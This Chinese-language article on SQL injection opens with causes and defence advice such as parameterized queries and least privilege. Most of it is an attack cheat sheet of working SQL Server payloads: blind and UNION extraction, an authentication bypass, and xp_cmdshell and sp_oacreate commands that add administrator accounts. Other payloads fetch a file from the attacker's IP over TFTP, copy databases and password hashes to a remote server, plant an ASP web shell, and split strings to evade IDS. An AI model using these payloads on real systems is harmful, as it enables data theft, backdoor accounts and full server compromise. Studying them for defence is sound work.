SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程式，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程式没有细緻地过滤用户输入的数据，致使非法数据侵入系统。

根据相关技术原理，SQL注入可以分为平台层注入和代码层注入。前者由不安全的资料库配置或资料库平台的漏洞所致；后者主要是由于程式设计师对输入未进行细緻地过滤，从而执行了非法的数据查询。基于此，SQL注入的产生原因通常表现在以下几方面：①不当的类型处理；②不安全的数据库配置；③不合理的查询集处理；④不当的错误处理；⑤转义字元处理不合适；⑥多个提交处理不当。

当应用程式使用输入内容来构造动态sql语句以访问资料库时，会发生sql注入攻击。如果代码使用存储过程，而这些存储过程作为包含未筛选的用户输入的字元串来传递，也会发生sql注入。sql注入可能导致攻击者使用应用程式登入在资料库中执行命令。相关的SQL注入可以通过测试工具pangolin进行。如果应用程式使用特权过高的帐户连线到资料库，这种问题会变得很严重。在某些表单中，用户输入的内容直接用来构造动态sql命令，或者作为存储过程的输入参数，这些表单特别容易受到sql注入的攻击。而许多网站程式在编写时，没有对用户输入的合法性进行判断或者程式中本身的变数处理不当，使应用程式存在安全隐患。这样，用户就可以提交一段资料库查询的代码，根据程式返回的结果，获得一些敏感的信息或者控制整个伺服器，于是sql注入就发生了。

归纳一下，主要有以下几点：

1.永远不要信任用户的输入。对用户的输入进行校验，可以通过正则表达式，或限制长度；对单引号和

双"-"进行转换等。

2.永远不要使用动态拼装sql，可以使用参数化的sql或者直接使用存储过程进行数据查询存取。

3.永远不要使用管理员许可权的资料库连线，为每个套用使用单独的许可权有限的资料库连线。

4.不要把机密信息直接存放，加密或者hash掉密码和敏感的信息。

5.套用的异常信息应该给出儘可能少的提示，最好使用自定义的错误信息对原始错误信息进行包装

6.sql注入的检测方法一般採取辅助软体或网站平台来检测，软体一般採用sql注入检测工具jsky，网站平台就有亿思网站安全平台检测工具。MDCSOFT SCAN等。採用MDCSOFT-IPS可以有效的防御SQL注入，XSS攻击等。

先猜表名

And (Select count(*) from 表名)<>0

猜列名

And (Select count（列名） from 表名）<>0

或者也可以这样

and exists (select * from 表名）

and exists (select 列名 from 表名）

返回正确的，那幺写的表名或列名就是正确

这里要注意的是，exists这个不能套用于猜内容上，例如and exists (select len(user) from admin)>3 这样是不行的

很多人都是喜欢查询里面的内容，一旦iis没有关闭错误提示的，那幺就可以利用报错方法轻鬆获得库里面的内容

获得资料库连线用户名：；and user>0

引用《SQL注入天书》，重点在and user>0，user是SQLServer的一个内置变数，它的值是当前连线的用户名，类型为nvarchar。拿一个 nvarchar的值跟int的数0比较，系统会先试图将nvarchar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar转换int异常，XXXX不能转换成int"

看到这里大家明白了吧，报错的原理就是利用SQLserver内置的系统表进行转换查询，转换过程会出错，然后就会显示出在网页上，另外还有类似的and 1=(selet top 1 user from admin），这种语句也是可以爆出来的。；and db_name()>0 则是暴资料库名。

一旦关闭了IIS报错，那幺还可以用union（联合查询）来查内容，主要语句就是

Order by 10

And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin

And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

上面的order by 10主要就是查栏位数目，admin就是表名，可以自己猜，user,passwd是列名

反正就是返回正确即对，返回异常即错

另外还有十分常用的ASCII码拆半法

先要知道指定列名，例如user里的内容的长度

and (select len(user) from admin)=2 就是查询长度为不为2位，返回错误的增加或减少数字，一般这个数字不会太大，太大的就要放弃了，猜也多余

后面的逻辑符号可以根据不同要求更改的，

>；大于 <；小于 =就是等于咯，更新语句的话，=也可以表示传递符号 <>；就是不等

知道了长度后就可以开始猜解了

And (Select top 1 asc(mid(user,n,1)) from admin)>100

n就是猜解的表名的第几位，最后的长度数字就是刚才猜解出来的列名长度了，And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里内容的第一位的ASCII字元是不是大于100

正确的话，那幺表示USER第一个字元的ASCII码大于100，那幺就猜>120，返回错误就是介于100－120之间，然后再一步一步的缩少，最终得到正确字元XXX，然后用ASCII转换器吧这个转换成普通字元就可以了

然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去

加在url后面，列名表名还是先猜解，返回正确的代表帐号的ASCII码大于100，那幺就再向前猜，直到报错，把猜出来的ASCII码拿去ASCII转换器转换就可以了，中文是负数，加上asb取绝对值

And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320

得到之后就记得在数字前加-号，不然ASCII转换器转换不来的，中文在ASCII码里是-23423这样的，所以猜起来挺麻烦

这个猜解速度比较慢，但是效果最好，最具有广泛性

后台身份验证绕过漏洞

验证绕过漏洞就是'or'='or'后台绕过漏洞，利用的就是AND和OR的运算规则，从而造成后台脚本逻辑性错误

例如管理员的账号密码都是admin，那幺再比如后台的资料库查询语句是

user=request("user")

passwd=request("passwd")

sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''

那幺我使用'or 'a'='a来做用户名密码的话，那幺查询就变成了

select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'

这样的话，根据运算规则，这里一共有4个查询语句，那幺查询结果就是 假or真and假or真，先算and 再算or，最终结果为真，这样就可以进到后台了

这种漏洞存在必须要有2个条件，第一个：在后台验证代码上，账号密码的查询是要同一条查询语句，也就是类似

sql="select * from admin where username='"&username&'&"passwd='"&passwd&'

如果一旦账号密码是分开查询的，先查帐号，再查密码，这样的话就没有办法了。

第二就是要看密码加不加密，一旦被MD5加密或者其他加密方式加密的，那就要看第一种条件有没有可以，没有达到第一种条件的话，那就没有戏了

防御方法

如果自己编写防注代码，一般是先定义一个函式，再在里面写入要过滤的关键字，如select ; “”；from；等，这些关键字都是查询语句最常用的词语，一旦过滤了，那幺用户自己构造提交的数据就不会完整地参与资料库的操作。

当然如果你的网站提交的数据全部都是数字的，可以使用小竹提供的方法

Function SafeRequest(ParaName,ParaType)

'--- 传入参数 ---

'ParaName：参数名称-字元型

'ParaType：参数类型-数字型（1表示以上参数是数字，0表示以上参数为字元）

Dim ParaValue

ParaValue=Request(ParaName)

If ParaType=1 then

If not isNumeric(ParaValue) then

Response.write "参数" & ParaName & "必须为数字型！"

Response.end

End if

Else

ParaValue=replace(ParaValue,"'","''")

End if

SafeRequest=ParaValue

End function

然后就用SafeRequest（）来过滤参数 ，检查参数是否为数字，不是数字的就不能通过。

SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。

对资料库类型、版本等信息进行识别是此类型攻击的动机所在。它的目的是收集资料库的类型、结构等信息为其他类型的攻击做準备，可谓是攻击的一个预备步骤。利用应用程式伺服器返回的默认错误信息而取得漏洞信息。

除HTTP回响外，能通过通道获取数据，然而，通道大都依赖与资料库支持的功能而存在，所以这项技术不完全适用于所有的资料库平台。SQL注入的非主流通道主要有E-mail、DNS以及资料库连线，基本思想为：先对SQL查询打包，然后藉助非主流通道将信息反馈至攻击者。

不同的SQL资料库有许多不同是特殊字元和变数，通过某些配置不安全或过滤不细緻的套用系统能够取得某些有用的信息，从而对进一步攻击提供方向。

此方式具体可分为基于内容、基于时间、基于错误三种形式。一般在经过常规访问后加上条件语句，根据信息反馈来判定被攻击的目标。

通过某些标準存储过程，资料库厂商对资料库的功能进行扩展的同时，系统也可与进行互动。部分存储过程可以让用户自行定义。通过其他类型的攻击收集到资料库的类型、结构等信息后，便能够建构执行存储过程的命令。这种攻击类型往往能达到远程命令执行、特权扩张、拒绝服务的目的。

虽然对于通常的编码都可利用某些过滤技术进行SQL注入防範，但是鑒于此种情况下也有许多方法避开过滤，一般可达到此目的的技术手段包括SQL注释和动态查询的使用，利用截断，URL编码与空位元组的使用，大小写变种的使用以及嵌套剥离后的表达式等等。藉助于此些手段，输入构思后的查询可以避开输入过滤，从而攻击者能获得想要的查询结果。

能够明确资料库模式、提取数据以及识别可注入参数。此种方式的攻击通过网站对用户输入的反馈信息，对可注入参数、资料库模式推断，这种攻击构造的查询执行后获得的答案只有真、假两种。基于推断的注入方式主要分为时间测定注入与盲注入两种。前者是在注入语句里加入语句诸如“waitfor 100”，按照此查询结果出现的时间对注入能否成功和数据值範围的推导进行判定；后者主要是“and l=l”、“and l=2”两种经典注入方法。这些方式均是对一些间接关联且能取得回应的问题进行提问，进而通过回响信息推断出想要信息，然后进行攻击。

了解了SQL注入的方法，如何能防止SQL注入？如何进一步防範SQL注入的泛滥？通过一些合理的操作和配置来降低SQL注入的危险。

使用参数化的过滤性语句

要防御SQL注入，用户的输入就绝对不能直接被嵌入到SQL语句中。恰恰相反，用户的输入必须进行过滤，或者使用参数化的语句。参数化的语句使用参数而不是将用户输入嵌入到语句中。在多数情况中，SQL语句就得以修正。然后，用户输入就被限于一个参数。

检查用户输入的合法性，确信输入的内容只包含合法的数据。数据检查应当在客户端和伺服器端都执行之所以要执行伺服器端验证，是为了弥补客户端验证机制脆弱的安全性。
在客户端，攻击者完全有可能获得网页的原始码，修改验证合法性的脚本（或者直接删除脚本），然后将非法内容通过修改后的表单提交给伺服器。因此，要保证验证操作确实已经执行，唯一的办法就是在伺服器端也执行验证。你可以使用许多内建的验证对象，例如Regular Expression Validator，它们能够自动生成验证用的客户端脚本，当然你也可以插入伺服器端的方法调用。如果找不到现成的验证对象，你可以通过Custom Validator自己创建一个。

防範SQL注入，还要避免出现一些详细的错误讯息，因为黑客们可以利用这些讯息。要使用一种标準的输入确认机制来验证所有的输入数据的长度、类型、语句、企业规则等。

将用户登录名称、密码等数据加密保存。加密用户输入的数据，然后再将它与资料库中保存的数据比较，这相当于对用户输入的数据进行了“消毒”处理，用户输入的数据不再对资料库有任何特殊的意义，从而也就防止了攻击者注入SQL命令。

SQL参数的传递方式将防止攻击者利用单引号和连字元实施攻击。此外，它还使得资料库许可权可以限制到只允许特定的存储过程执行，所有的用户输入必须遵从被调用的存储过程的安全上下文，这样就很难再发生注入式攻击了。

攻击者们目前正在自动搜寻攻击目标并实施攻击，其技术甚至可以轻易地被套用于其它的Web架构中的漏洞。企业应当投资于一些专业的漏洞扫描工具，如大名鼎鼎的Acunetix的Web漏洞扫描程式等。一个完善的漏洞扫描程式不同于网路扫描程式，它专门查找网站上的SQL注入式漏洞。最新的漏洞扫描程式可以查找最新发现的漏洞。

锁定你的资料库的安全，只给访问资料库的web套用功能所需的最低的许可权，撤销不必要的公共许可，使用强大的加密技术来保护敏感数据并维护审查跟蹤。如果web套用不需要访问某些表，那幺确认它没有访问这些表的许可权。如果web套用只需要唯读的许可权，那幺就禁止它对此表的 drop 、insert、update、delete 的许可权，并确保资料库打了最新补丁。

在部署套用系统前，始终要做安全审评。建立一个正式的安全过程，并且每次做更新时，要对所有的编码做审评。开发队伍在正式上线前会做很详细的安全审评，然后在几周或几个月之后他们做一些很小的更新时，他们会跳过安全审评这关， “就是一个小小的更新，我们以后再做编码审评好了”。请始终坚持做安全审评。

1.判断有无注入点

; and 1=1 and 1=2

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判断是否存在admin这张表

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

4.猜解栏位名称 在len( ) 括弧里面加上我们想到的栏位名称.

and 1=(select count(*) from admin where len(*)>0)--

and 1=(select count(*) from admin where len（用户栏位名称name)>0)

and 1=(select count(*) from admin where len（密码栏位名称password)>0)

and 1=(select count(*) from admin where len(*)>0)

and 1=(select count(*) from admin where len(name)>6) 错误

and 1=(select count(*) from admin where len(name)>5) 正确 长度是6

and 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确

and 1=(select count(*) from admin where len(password)>12) 错误 长度是12

and 1=(select count(*) from admin where len(password)=12) 正确

and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位

and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位

就这样一次加一个字元这样猜，猜到够你刚才猜出来的多少位了就对了，帐号就算出来了

and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字元.

group by users. id having 1=1--

group by users. id,users.username,users.password,users.privs having 1=1--

; insert into users values( 666,attacker,foobar,0xffff )--

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN

(login_id)-

UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN

(login_id,login_name)-

UNION SELECT TOP 1 login_name FROM logintable-

UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

看伺服器打的补丁=出错了打了SP4补丁

and 1=(select @@VERSION)--

and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

and sa=(SELECT System_user)--

and user_name()=dbo--

and 0<>(select user_name()--

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--

xp_cmdshell被删除，恢复，支持绝对路径的恢复

;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--

;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--

;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

;DECLARE @shell INT EXEC SP_OACREATEwscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:\WINNT\system32\cmd.exe

/c net user jiaoniang$ 1866574 /add--

创建一个虚拟目录E盘：

;declare @o int exec sp_oacreatewscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"--

declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse

and 0<>(select top 1 paths from newtable)--

and 1=(select name from master.dbo.sysdatabases where dbid=7)--

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

依次提交 dbid = 7,8,9.... 得到更多的资料库名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一个表 假设为 admin

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in (Admin)) 来得到其他的表。

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin

and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个栏位，假设为 user_id

and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in

(id,...)) 来暴出其他的栏位

and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名

依次可以得到密码。假设存在user_id username,password 等栏位

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 得到表名

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U and name not in(Address))

and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin and uid>(str(id))) 判断id值

and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有栏位

id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用）

;create table [dbo].[swap] ([swappass][char](255));--

and (select top 1 swappass from swap)=1--

;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread

@rootkey=HKEY_LOCAL_MACHINE,@key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\,@value_name=/,

values=@testOUTPUT insert into paths(path) values(@test)--

;use ku1;--

;create table cmd (str image);-- 建立image类型的表cmd

存在xp_cmdshell的测试过程：

;exec master..xp_cmdshell dir

;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号

;exec master.dbo.sp_password null,jiaoniang$,1866574;--

;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--

;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes

/active:yes /add;--

;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--

exec master..xp_servicecontrol start,schedule 启动服务

exec master..xp_servicecontrol start,server

; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C：\WINNT\system32

\cmd.exe /c net user jiaoniang$ 1866574 /add

;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C：\WINNT\system32\cmd.exe

/c net localgroup administrators jiaoniang$ /add

; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传档案

;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\

;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\

;declare @a;set @a=db_name();backup database @a to disk=你的IP你的已分享资料夹bak.dat

如果被限制则可以。

select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)

查询构造：

SELECT * FROM news WHERE id=... AND topic=... AND .....

adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>

select 123;--

;use master;--

:a or name like fff%;-- 显示有一个叫ffff的用户哈。

and 1<>(select count(email) from [user]);--

;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--

;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--

;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--

;update [users] set email=(select top 1 count(id) from password) where name=ffff;--

;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--

;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--

上面的语句是得到资料库中的第一个用户表，并把表名放在ffff用户的信箱栏位中。

通过查看ffff的用户资料可得第一个用表叫ad

然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into users values( 666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char

(0x69)+char(0x73),0xffff)--

insert into users values( 667,123,123,0xffff)--

insert into users values ( 123,admin--,password,0xffff)--

;and user>0

;and (select count(*) from sysobjects)>0

;and (select count(*) from mysysobjects)>0 //为access资料库

;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--

这是将第一个表名更新到aaa的栏位处。

读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>；刚才得到的表名）。

;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--

然后id=1552 and exists(select * from aaa where aaa>5)

读出第二个表，一个个的读出，直到没有为止。

读栏位是这样：

;update aaa set aaa=(select top 1 col_name(object_id（表名），1));--

然后id=152 and exists(select * from aaa where aaa>5)出错，得到栏位名

;update aaa set aaa=(select top 1 col_name(object_id（表名），2));--

然后id=152 and exists(select * from aaa where aaa>5)出错，得到栏位名

[获得数据表名][将栏位值更新为表名，再想法读出这个栏位的值就可得到表名]

update 表名 set 栏位=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>；你得到的表名 查出一个加一个])

[ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2，…）

通过SQLSERVER注入漏洞建资料库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

[获得数据表栏位名][将栏位值更新为栏位名，再想法读出这个栏位的值就可得到栏位名]

update 表名 set 栏位=(select top 1 col_name(object_id（要查询的数据表名），栏位列如：1) [ where 条件]

绕过IDS的检测[使用变数]

;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\

;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\

基本语法

select * from OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1 )

参数： (1) OLEDB Provider name

其中连线字元串参数可以是任何连线埠用来连线，比如

select * from OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table

複製目标主机的整个资料库insert所有远程表到本地表。

基本语法：

insert into OPENROWSET(SQLOLEDB,server=servername;uid=sa;pwd=123,select * from table1) select * from table2

这行语句将目标主机上table2表中的所有数据複製到远程资料库中的table1表中。实际运用中适当修改连线字元串的IP位址和连线埠，指向需要的地方，比如：

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from

table2

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)

select * from master.dbo.sysdatabases

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)

select * from user_database.dbo.sysobjects

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)

select * from user_database.dbo.syscolumns

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1 insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * fromdatabase..table2

複製哈西表（HASH）登录密码的hash存储于sysxlogins中。方法如下：

insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select

* from database.dbo.sysxlogins

得到hash之后，就可以进行暴力破解。

遍历目录的方法：先创建一个临时表：temp

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构，并寸入temp表中

;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个档案的内容

;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--

;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--

;insert into temp(id) exec master.dbo.xp_cmdshell cscript. C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc

;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- （xp_dirtree适用许可权PUBLIC）

写入表：

语句1：and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

语句2：and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

语句3：and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

语句4：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

语句5：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

语句6：and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

语句7：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

语句8：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

语句9：and 1=(SELECT IS_MEMBER(db_owner));--

把路径写到表中去：

;create table dirs(paths varchar(100),id int)--

;insert dirs exec master.dbo.xp_dirtree c:\--

and 0<>(select top 1 paths from dirs)--

and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--

;create table dirs1(paths varchar(100),id int)--

;insert dirs exec master.dbo.xp_dirtree e:\web--

and 0<>(select top 1 paths from dirs1)--

把资料库备份到网页目录：下载

;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--

and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)

and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。

and 1=(select user_id from USER_LOGIN)

and 0=(select user from USER_LOGIN where user>1)

-=-wscript.shellexample -=-

declare @o int

exec sp_oacreate wscript.shell,@o out

exec sp_oamethod @o,run,NULL,notepad.exe

; declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,notepad.exe--

declare @o int,@f int,@t int,@ret int

declare @line varchar(8000)

exec sp_oacreate scripting.filesystemobject,@o out

exec sp_oamethod @o,opentextfile,@f out,c:\boot.ini,1

exec @ret = sp_oamethod @f,readline,@line out

while( @ret = 0 )

begin

print @line

exec @ret = sp_oamethod @f,readline,@line out

end

declare @o int,@f int,@t int,@ret int

exec sp_oacreate scripting.filesystemobject,@o out

exec sp_oamethod @o,createtextfile,@f out,c:\inetpub\wwwroot\foo.asp,1

exec @ret = sp_oamethod @f,writeline,NULL,

<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>

declare @o int,@ret int

exec sp_oacreate speech.voicetext,@o out

exec sp_oamethod @o,register,NULL,foo,bar

exec sp_oasetproperty @o,speed,150

exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to,us,528 waitfor delay 00:00:05

; declare @o int,@ret int exec sp_oacreate speech.voicetext,@o out exec sp_oamethod @o,register,NULL,foo,bar exec

sp_oasetproperty @o,speed,150 exec sp_oamethod @o,speak,NULL,all your sequel servers are belong to us,528 waitfor delay 00:00:05--

xp_dirtree适用许可权PUBLIC

exec master.dbo.xp_dirtree c:\

返回的信息有两个栏位subdirectory、depth。Subdirectory栏位是字元型，depth栏位是整形栏位。

create table dirs(paths varchar(100),id int)

建表，这里建的表是和上面xp_dirtree相关连，栏位相等、类型相同。

insert dirs exec master.dbo.xp_dirtree c:\

只要我们建表与存储进程返回的栏位相定义相等就能够执行！达到写表的效果.